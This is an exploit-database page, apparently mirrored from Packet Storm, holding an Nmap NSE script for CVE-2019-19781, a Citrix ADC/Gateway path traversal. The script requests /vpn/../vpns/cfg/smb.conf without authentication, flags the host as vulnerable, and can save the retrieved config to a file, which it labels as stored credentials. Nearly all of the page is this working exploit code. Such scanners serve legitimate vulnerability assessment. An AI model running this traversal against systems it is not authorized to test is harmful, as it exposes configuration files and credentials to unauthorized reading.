Lucene search
K

Citrix ADC / Gateway Path Traversal

🗓️ 16 Jan 2020 00:00:00Reported by Mishra DhirajType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 480 Views

Citrix ADC / Gateway Path Traversal CVE-2019-19781 vulnerability chec

Related
Code
`# Exploit Title: Path Traversal in Citrix Application Delivery Controller  
(ADC) and Gateway.  
# Date: 17-12-2019  
# CVE: CVE-2019-19781  
# Vulenrability: Path Traversal  
# Vulnerablity Discovery: Mikhail Klyuchnikov  
# Exploit Author: Dhiraj Mishra  
# Vulnerable Version: 10.5, 11.1, 12.0, 12.1, and 13.0  
# Vendor Homepage: https://www.citrix.com/  
# References: https://support.citrix.com/article/CTX267027  
# https://github.com/nmap/nmap/pull/1893  
  
local http = require "http"  
local stdnse = require "stdnse"  
local shortport = require "shortport"  
local table = require "table"  
local string = require "string"  
local vulns = require "vulns"  
local nmap = require "nmap"  
local io = require "io"  
  
description = [[  
This NSE script checks whether the traget server is vulnerable to  
CVE-2019-19781  
]]  
---  
-- @usage  
-- nmap --script https-citrix-path-traversal -p <port> <host>  
-- nmap --script https-citrix-path-traversal -p <port> <host> --script-args  
output='file.txt'  
-- @output  
-- PORT STATE SERVICE  
-- 443/tcp open http  
-- | CVE-2019-19781:  
-- | Host is vulnerable to CVE-2019-19781  
-- @changelog  
-- 16-01-2020 - Author: Dhiraj Mishra (@RandomDhiraj)  
-- 17-12-2019 - Discovery: Mikhail Klyuchnikov (@__Mn1__)  
-- @xmloutput  
-- <table key="NMAP-1">  
-- <elem key="title">Citrix ADC Path Traversal aka (Shitrix)</elem>  
-- <elem key="state">VULNERABLE</elem>  
-- <table key="description">  
-- <elem>Citrix Application Delivery Controller (ADC) and Gateway 10.5,  
11.1, 12.0, 12.1, and 13.0 are vulnerable to a unauthenticated path  
-- traversal vulnerability that allows attackers to read configurations or  
any other file.  
-- </table>  
-- <table key="dates">  
-- <table key="disclosure">  
-- <elem key="year">2019</elem>  
-- <elem key="day">17</elem>  
-- <elem key="month">12</elem>  
-- </table>  
-- </table>  
-- <elem key="disclosure">17-12-2019</elem>  
-- <table key="extra_info">  
-- </table>  
-- <table key="refs">  
-- <elem>https://support.citrix.com/article/CTX267027</elem>  
-- <elem>https://nvd.nist.gov/vuln/detail/CVE-2019-19781</elem>  
-- </table>  
-- </table>  
  
author = "Dhiraj Mishra (@RandomDhiraj)"  
Discovery = "Mikhail Klyuchnikov (@__Mn1__)"  
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"  
categories = {"discovery", "intrusive","vuln"}  
  
portrule = shortport.ssl  
  
action = function(host,port)  
local outputFile = stdnse.get_script_args(SCRIPT_NAME..".output") or nil  
local vuln = {  
title = 'Citrix ADC Path Traversal',  
state = vulns.STATE.NOT_VULN,  
description = [[  
Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0,  
12.1, and 13.0 are vulnerable  
to a unauthenticated path traversal vulnerability that allows attackers to  
read configurations or any other file.  
]],  
references = {  
'https://support.citrix.com/article/CTX267027',  
'https://nvd.nist.gov/vuln/detail/CVE-2019-19781',  
},  
dates = {  
disclosure = {year = '2019', month = '12', day = '17'},  
},  
}  
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)  
local path = "/vpn/../vpns/cfg/smb.conf"  
local response  
local output = {}  
local success = "Host is vulnerable to CVE-2019-19781"  
local fail = "Host is not vulnerable"  
local match = "[global]"  
local credentials  
local citrixADC  
response = http.get(host, port.number, path)  
  
if not response.status then  
stdnse.print_debug("Request Failed")  
return  
end  
if response.status == 200 then  
if string.match(response.body, match) then  
stdnse.print_debug("%s: %s GET %s - 200 OK",  
SCRIPT_NAME,host.targetname or host.ip, path)  
vuln.state = vulns.STATE.VULN  
citrixADC = (("Path traversal: https://%s:%d%s"):format(host.targetname  
or host.ip,port.number, path))  
if outputFile then  
credentials = response.body:gsub('%W','.')  
vuln.check_results = stdnse.format_output(true, citrixADC)  
vuln.extra_info = stdnse.format_output(true, "Credentials are being  
stored in the output file")  
file = io.open(outputFile, "a")  
file:write(credentials, "\n")  
else  
vuln.check_results = stdnse.format_output(true, citrixADC)  
end  
end  
elseif response.status == 403 then  
stdnse.print_debug("%s: %s GET %s - %d", SCRIPT_NAME, host.targetname  
or host.ip, path, response.status)  
vuln.state = vulns.STATE.NOT_VULN  
end  
  
return vuln_report:make_output(vuln)  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jan 2020 00:00Current
10High risk
Vulners AI Score10
EPSS0.99999
480